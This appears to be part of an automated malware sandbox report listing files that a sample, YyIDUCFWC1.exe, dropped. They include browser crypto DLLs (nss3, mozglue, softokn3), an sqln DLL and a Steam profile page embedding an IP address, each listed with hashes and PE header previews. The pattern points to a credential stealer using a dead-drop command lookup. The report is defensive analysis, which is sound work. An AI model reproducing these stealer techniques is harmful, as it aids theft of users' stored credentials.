                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Gpeym6icI3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: dc8laldmc8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: LB4129B9YX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: 1526RpgCee.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: sLpIvcY3xo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                                                                                            • Filename: LXoASvZRu1.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: nXXx6yL69w.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: Gpeym6icI3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: dc8laldmc8.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: LB4129B9YX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: 1526RpgCee.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            • Filename: sLpIvcY3xo.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YyIDUCFWC1.exe.log

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\YyIDUCFWC1.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):522
                                                                                                                                                                                                                                            Entropy (8bit):5.358731107079437
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                                                                                                                                                                                                                            MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                                                                                                                                                                                                                            SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                                                                                                                                                                                                                            SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                                                                                                                                                                                                                            SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2969), with CRLF, LF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):33795
                                                                                                                                                                                                                                            Entropy (8bit):5.4370031530049685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:Ydpqm+0Iz3YAA9CWGtSfcDAXZ4VWBCW3KI8iCfJkPVoEAd2Z4VWBCW3KI8iKh2SY:Yd8m+0Iz3YAA9CWGtSFXZ4VWBCW3KI86
                                                                                                                                                                                                                                            MD5:B6A9CADDAB9B3456E9382D978E8D6E1E
                                                                                                                                                                                                                                            SHA1:F29AED0E232864DD97958D4504F2A229BA1D70FB
                                                                                                                                                                                                                                            SHA-256:645512B7CF2CCE499D43804DDD26EF4D3AA2FBA2CFF60E951D573B2406A44294
                                                                                                                                                                                                                                            SHA-512:C9DDE63EF873C6053BA08A459E26AEFB1B21EDD55ACF1D72E3962B1DC413C111AD9769AD77F3BF41AFAE83EE4FCF54A450E51871718415C972C18EBDDF416540
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: ve74r https://65.109.242.73|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link hr

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqln[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2459136
                                                                                                                                                                                                                                            Entropy (8bit):6.052474106868353
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                                                                            MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                                                                            SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                                                                            SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                                                                            SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):685392
                                                                                                                                                                                                                                            Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):608080
                                                                                                                                                                                                                                            Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):450024
                                                                                                                                                                                                                                            Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2046288
                                                                                                                                                                                                                                            Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257872
                                                                                                                                                                                                                                            Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):80880
                                                                                                                                                                                                                                            Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll

                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\YyIDUCFWC1.exe
                                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
